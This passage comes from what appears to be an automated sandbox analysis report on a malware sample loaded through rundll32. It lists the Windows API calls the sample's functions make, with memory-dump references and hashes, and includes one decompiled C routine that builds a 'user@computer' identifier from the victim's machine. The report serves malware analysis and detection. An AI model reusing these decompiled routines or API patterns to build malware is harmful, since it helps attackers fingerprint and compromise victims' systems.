                              • Part of subcall function 04F724C3: SetLastError.KERNEL32(000000B7,?,04F75C3C,?,?,00000000,?,?,?), ref: 04F724E0
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04F75C5C
                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04F75D34
                              • Part of subcall function 04F6A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04F6A990
                              • Part of subcall function 04F6A976: CreateWaitableTimerA.KERNEL32(04F8A1E8,00000001,?), ref: 04F6A9AD
                              • Part of subcall function 04F6A976: GetLastError.KERNEL32(?,00000000,04F78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F6A9BE
                              • Part of subcall function 04F6A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6A9FE
                              • Part of subcall function 04F6A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA1D
                              • Part of subcall function 04F6A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA33
                            • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04F75D1D
                            • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04F75D26
                              • Part of subcall function 04F724C3: CreateMutexA.KERNEL32(04F8A1E8,00000000,?,?,04F75C3C,?,?,00000000,?,?,?), ref: 04F724F3
                            • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 04F75D41
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                            • String ID:
                            • API String ID: 1700416623-0
                            • Opcode ID: 03efcef9fe385be0e87fb228a0e0b309e7f20c85b604ad05b595d28a5c18346b
                            • Instruction ID: 0a8baca138f54c3d3c1c6bc4466efb298cad8cb98643b7ef02c29d8b509e0e62
                            • Opcode Fuzzy Hash: 03efcef9fe385be0e87fb228a0e0b309e7f20c85b604ad05b595d28a5c18346b
                            • Instruction Fuzzy Hash: B3318575E00209AFCB01AF74EC48D7A7BB5EB89314725842AE816DF250E679AC42CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlImageNtHeader.NTDLL(00000000), ref: 04F7C228
                              • Part of subcall function 04F6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04F67D5E), ref: 04F6A6BE
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,04F689E4,00000000), ref: 04F7C26A
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 04F7C2BC
                            • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,04F689E4,00000000), ref: 04F7C2D5
                              • Part of subcall function 04F6E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F6EA0D
                              • Part of subcall function 04F6E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,04F7C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 04F6EA50
                            • GetLastError.KERNEL32(?,00000000,04F689E4,00000000,?,?,?,?,?,?,?,04F69100,?), ref: 04F7C30D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                            • String ID:
                            • API String ID: 1921436656-0
                            • Opcode ID: 36f613e6c6ffaf53153fce37a008958b8721f733160fbc068f5b93862835a6b7
                            • Instruction ID: 9602c563ad9011bfeed5ddc311bdfcef048ee6fc170d6863f0901c57c1a489f1
                            • Opcode Fuzzy Hash: 36f613e6c6ffaf53153fce37a008958b8721f733160fbc068f5b93862835a6b7
                            • Instruction Fuzzy Hash: A2311E75E00249AFDF25DFA4DC40EBE7BB5EF08754F00005AEA05AB251D778AD46DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 04F6A078
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F6A091
                            • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 04F6A09E
                            • lstrlen.KERNEL32(04F8B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 04F6A0B0
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 04F6A0E1
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                            • String ID:
                            • API String ID: 2734445380-0
                            • Opcode ID: 239b68c696b2e960b6ef96c55c0d7a6ddc682661d268c0ba6f664fff4570ecf0
                            • Instruction ID: b1b1da22dc024eeb820f1a55d9ddf4649617988487549d95103b6890db990d67
                            • Opcode Fuzzy Hash: 239b68c696b2e960b6ef96c55c0d7a6ddc682661d268c0ba6f664fff4570ecf0
                            • Instruction Fuzzy Hash: 86315C72900209FFDB11DFA5DC88EEE7BB8EF45314F148058F915A6200E779A956DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,04F63DA2,00000000,00000001,?,?,?), ref: 04F6DD92
                            • lstrlen.KERNEL32(?), ref: 04F6DDA2
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F6DDD6
                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 04F6DE01
                            • memcpy.NTDLL(00000000,?,?), ref: 04F6DE20
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6DE81
                            • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 04F6DEA3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Allocatelstrlenmemcpy$Free
                            • String ID:
                            • API String ID: 3204852930-0
                            • Opcode ID: a792b72c18787b451b2645b5ccf6d423ca27f0f71a7cb9e69f6f0235d9fe7afd
                            • Instruction ID: a4349fe37f3e2d7c5fb5b2f51a04e61008d031c5d33a8243a823a6dbb01cf9e8
                            • Opcode Fuzzy Hash: a792b72c18787b451b2645b5ccf6d423ca27f0f71a7cb9e69f6f0235d9fe7afd
                            • Instruction Fuzzy Hash: 2E3108B2D0020AAFDF11DFA5CC809EE7BB9FF58244F044469E915AB211E731EA55DFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F770C3: RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F770CB
                              • Part of subcall function 04F770C3: RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F770E0
                              • Part of subcall function 04F770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 04F770F9
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F71F04
                            • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,04F78667,?,00000000), ref: 04F71F15
                            • lstrcmpi.KERNEL32(00000002,?), ref: 04F71F5B
                            • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,04F78667,?,00000000), ref: 04F71F6F
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,04F78667,?,00000000), ref: 04F71FB5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                            • String ID:
                            • API String ID: 733514052-0
                            • Opcode ID: 6bb063e2625a6a6158ba901f27143bf2eecb4c07f486be99f67d2ebe6e25aed0
                            • Instruction ID: 623e3fa1b78b1e02ce238619be5ea400f5dc5036b3a57392c0a75095cae06f7a
                            • Opcode Fuzzy Hash: 6bb063e2625a6a6158ba901f27143bf2eecb4c07f486be99f67d2ebe6e25aed0
                            • Instruction Fuzzy Hash: 73318572E00219BFDB109FA4ED84AEE7BB9FF04354F14406AF9059B300D779AD4A9B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,04F6243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7D58C
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F62454
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F62467
                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04F62478
                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04F624E3
                            • InterlockedIncrement.KERNEL32(04F8A43C), ref: 04F624FA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                            • String ID:
                            • API String ID: 3915436794-0
                            • Opcode ID: 6e652fe648e61f1ad44e59c80205bc952fc8dc3c48d7da89f77c14dbc699de9c
                            • Instruction ID: 90b103da7d7ea6aa27efb99f0d932755d6ceca5dc7e2187d4b0c3a47732ed865
                            • Opcode Fuzzy Hash: 6e652fe648e61f1ad44e59c80205bc952fc8dc3c48d7da89f77c14dbc699de9c
                            • Instruction Fuzzy Hash: 7F31B131D012069FDB21EF28E84892BB7E5FB84325B02455EF8568B255D738FC12CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,04F6E23D,00000000,7620F5B0,04F70348,?,00000001), ref: 04F686CD
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F686E2
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F686FE
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F68713
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F68727
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$AddressProc
                            • String ID:
                            • API String ID: 1469910268-0
                            • Opcode ID: 00092f1dae7691b2dcf454759e037088d2a8b23fc0374c21486381339c2a1170
                            • Instruction ID: c6f7cb0bcbf3e24d45db463f80787c8d101ff5a1b11cfc16b5e191f8205f176c
                            • Opcode Fuzzy Hash: 00092f1dae7691b2dcf454759e037088d2a8b23fc0374c21486381339c2a1170
                            • Instruction Fuzzy Hash: 933138B6A40A1A9FCB01DF68F881E7573E9EB09710B40805EE605DF200D7B8EC028F54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04F7833B
                            • GetComputerNameW.KERNEL32(00000000,?), ref: 04F78357
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetUserNameW.ADVAPI32(761F81D0,761B5520), ref: 04F78391
                            • GetComputerNameW.KERNEL32(?,?), ref: 04F783B4
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,761F81D0,?,00000000,?,00000000,00000000), ref: 04F783D7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                            • String ID:
                            • API String ID: 3850880919-0
                            • Opcode ID: 5cec289e6c36a56dae174fc78ddc880eea24411c617fb17019df9ebf27b94efc
                            • Instruction ID: 561b21221916b7859d573f6195250e29251f4f091fd21419cef768655a562c5b
                            • Opcode Fuzzy Hash: 5cec289e6c36a56dae174fc78ddc880eea24411c617fb17019df9ebf27b94efc
                            • Instruction Fuzzy Hash: 3A21C5B6900209FFDB11DFA8D988CEEBBBCEB44344B5044AAE501EB240E634AB45DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A12A11() {
                            				long _v8;
                            				long _v12;
                            				int _v16;
                            				long _t39;
                            				long _t43;
                            				signed int _t47;
                            				short _t51;
                            				signed int _t52;
                            				int _t56;
                            				int _t57;
                            				char* _t64;
                            				short* _t67;
                            
                            				_v16 = 0;
                            				_v8 = 0;
                            				GetUserNameW(0,  &_v8);
                            				_t39 = _v8;
                            				if(_t39 != 0) {
                            					_v12 = _t39;
                            					_v8 = 0;
                            					GetComputerNameW(0,  &_v8);
                            					_t43 = _v8;
                            					if(_t43 != 0) {
                            						_t11 = _t43 + 2; // 0x746bc742
                            						_v12 = _v12 + _t11;
                            						_t64 = E04A16D63(_v12 + _t11 << 2);
                            						if(_t64 != 0) {
                            							_t47 = _v12;
                            							_t67 = _t64 + _t47 * 2;
                            							_v8 = _t47;
                            							if(GetUserNameW(_t67,  &_v8) == 0) {
                            								L7:
                            								E04A16C2C(_t64);
                            							} else {
                            								_t51 = 0x40;
                            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                            								_t52 = _v8;
                            								_v12 = _v12 - _t52;
                            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                            									goto L7;
                            								} else {
                            									_t56 = _v12 + _v8;
                            									_t31 = _t56 + 2; // 0x4a157e9
                            									_v12 = _t56;
                            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                            									_v8 = _t57;
                            									if(_t57 == 0) {
                            										goto L7;
                            									} else {
                            										_t64[_t57] = 0;
                            										_v16 = _t64;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v16;
                            			}

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,04A157E7), ref: 04A12A25
                            • GetComputerNameW.KERNEL32(00000000,04A157E7), ref: 04A12A41
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • GetUserNameW.ADVAPI32(00000000,04A157E7), ref: 04A12A7B
                            • GetComputerNameW.KERNEL32(04A157E7,746BC740), ref: 04A12A9E
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04A157E7,00000000,04A157E9,00000000,00000000,?,746BC740,04A157E7), ref: 04A12AC1
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                            • String ID:
                            • API String ID: 3850880919-0
                            • Opcode ID: 48302456abe6555ea3a73acc33d6bc6ce4daabfc0bccc2d25cda78232e5655c3
                            • Instruction ID: bbf7bf7800c8f18c160a543f348ace32d61530e7574e51d06fed4d8fc23b19d7
                            • Opcode Fuzzy Hash: 48302456abe6555ea3a73acc33d6bc6ce4daabfc0bccc2d25cda78232e5655c3
                            • Instruction Fuzzy Hash: AF21D4B6900208FFDB21DFE9D9849AEBBBCFF54340B5044AAE501E7250E634AB45DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • DeleteFileA.KERNEL32(00000000,000004D2), ref: 04F63090
                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04F63099
                            • GetLastError.KERNEL32 ref: 04F630A3
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F63162
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                            • String ID:
                            • API String ID: 3543646443-0
                            • Opcode ID: 9bcea378b08ab5c09cb2cd5bb52f7d3875694143a9cfb68461d3a1841f7295c4
                            • Instruction ID: 0bb9f44756df82af35f7328e093608414f9ac7cade2931299ef4f73b21271dfb
                            • Opcode Fuzzy Hash: 9bcea378b08ab5c09cb2cd5bb52f7d3875694143a9cfb68461d3a1841f7295c4
                            • Instruction Fuzzy Hash: E5215172A01614BFD611ABA4FC48E96379CDF4A254B04405BBB05DF241DA2CF9058BF9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F71C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04F6E231,00000000,7620F5B0,04F70348,?,00000001), ref: 04F71C25
                              • Part of subcall function 04F71C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04F71C3B
                              • Part of subcall function 04F71C19: _snwprintf.NTDLL ref: 04F71C60
                              • Part of subcall function 04F71C19: CreateFileMappingW.KERNEL32(000000FF,04F8A1E8,00000004,00000000,00001000,?), ref: 04F71C7C
                              • Part of subcall function 04F71C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04F71C8E
                              • Part of subcall function 04F71C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04F71CC6
                            • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04F6E231,00000000,7620F5B0,04F70348,?,00000001), ref: 04F72F89
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F72F92
                            • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04F6E231,00000000,7620F5B0,04F70348,?,00000001), ref: 04F72FD9
                            • GetLastError.KERNEL32(04F73959,00000000,00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F73008
                            • CloseHandle.KERNEL32(00000000,04F73959,00000000,00000000,?,?,?,?,?,?,?,04F69100,?), ref: 04F73018
                              • Part of subcall function 04F6C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,04F6171E,?,?,00000000,?), ref: 04F6C2B6
                              • Part of subcall function 04F6C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,04F6171E,?,?,00000000,?), ref: 04F6C2DE
                              • Part of subcall function 04F6C2AA: memset.NTDLL ref: 04F6C2F0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                            • String ID:
                            • API String ID: 1106445334-0
                            • Opcode ID: f839248005ab063e0d401a6c6cfb8ef3b8c8d81bd0978ddd28642699abf42e26
                            • Instruction ID: 162995a92ed5d019494e9b6ef313b52fee839b700d4fa399795eb9cf1928b829
                            • Opcode Fuzzy Hash: f839248005ab063e0d401a6c6cfb8ef3b8c8d81bd0978ddd28642699abf42e26
                            • Instruction Fuzzy Hash: 38216231A00309ABEB11AFB4FC44A6A77A9EF00314B05046EE941D7150EB3DFD43DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,761B6920,00000000,?,?,?,04F6148A,?,?,?), ref: 04F7A66F
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,04F6148A,?,?,?), ref: 04F7A67F
                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,04F6148A,?,?,?), ref: 04F7A6AB
                            • GetLastError.KERNEL32(?,?,04F6148A,?,?,?), ref: 04F7A6D0
                            • CloseHandle.KERNEL32(000000FF,?,?,04F6148A,?,?,?), ref: 04F7A6E1
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateErrorHandleLastReadSize
                            • String ID:
                            • API String ID: 3577853679-0
                            • Opcode ID: 2d0c5efab39e9ccc50fc85eff7b9f404bdd64c11e92b8a2c26b4a40035a12382
                            • Instruction ID: 0115dca18ce84ba01b19e45cb79dfee170c7ee0379ba23eaa3070360131e9aab
                            • Opcode Fuzzy Hash: 2d0c5efab39e9ccc50fc85eff7b9f404bdd64c11e92b8a2c26b4a40035a12382
                            • Instruction Fuzzy Hash: 62112C72D00219BFDB205F64DCC8EBE7B5CEB04394F12053AF826AB180E678AD429790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?,00000000,00000001,00000000,?), ref: 04F675E9
                            • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?,00000000,00000001,00000000,?), ref: 04F67602
                            • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 04F6762A
                            • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 04F67639
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?), ref: 04F67670
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Trim$FreeHeap
                            • String ID:
                            • API String ID: 2132463267-0
                            • Opcode ID: ab10c5ca31777d5bb33e09da055a5bea60fb948f54b44afd8677fe31734e50e9
                            • Instruction ID: 796f31717d491a432f47a48b8bf45f2d42898cb7482c007842e2b6f6c46209ca
                            • Opcode Fuzzy Hash: ab10c5ca31777d5bb33e09da055a5bea60fb948f54b44afd8677fe31734e50e9
                            • Instruction Fuzzy Hash: 6B11867260020ABBD711AA5DEC85FAB7BECDB44794F104025BA06DB241EB75EC029B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,0138D5A8,?,?,00000000,00000000,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C), ref: 04F738D4
                            • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F73904
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F73913
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F73931
                            • GetLastError.KERNEL32(?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F73941
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                            • String ID:
                            • API String ID: 653387826-0
                            • Opcode ID: cdef089551fcf93922f8ff26247f1dacdf80bcda4b22ccbd889bbdc3204d2992
                            • Instruction ID: 1c71f5d7f68f272bad2de673a087b4141048fca3e52afc8952732398d5259817
                            • Opcode Fuzzy Hash: cdef089551fcf93922f8ff26247f1dacdf80bcda4b22ccbd889bbdc3204d2992
                            • Instruction Fuzzy Hash: DD2128B5A00B06FFD710CFA8D984A5ABBF8FF08314700852AEA5697B40D774F944DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 04F77436
                            • GetLastError.KERNEL32 ref: 04F77459
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04F7746C
                            • GetLastError.KERNEL32 ref: 04F77477
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F774BF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                            • String ID:
                            • API String ID: 1671499436-0
                            • Opcode ID: a92a940c6a1d139c3e0f4bcaf66a4f79472505ac7e28c924b5c265ea6c2033fe
                            • Instruction ID: 9fac0fc76ff24112778ce20d68e22bc1c56000ad0792debc7567d2ba12a93364
                            • Opcode Fuzzy Hash: a92a940c6a1d139c3e0f4bcaf66a4f79472505ac7e28c924b5c265ea6c2033fe
                            • Instruction Fuzzy Hash: CC219F71950248FBEB21AF50ED88F6E7FF9EB00318F60041AE1429A0A0D37DBD85AB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InterlockedIncrement.KERNEL32(04F8A06C), ref: 04F73785
                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 04F737DC
                            • InterlockedDecrement.KERNEL32(04F8A06C), ref: 04F737F1
                            • DeleteFileA.KERNEL32(00000000), ref: 04F7380F
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7381D
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
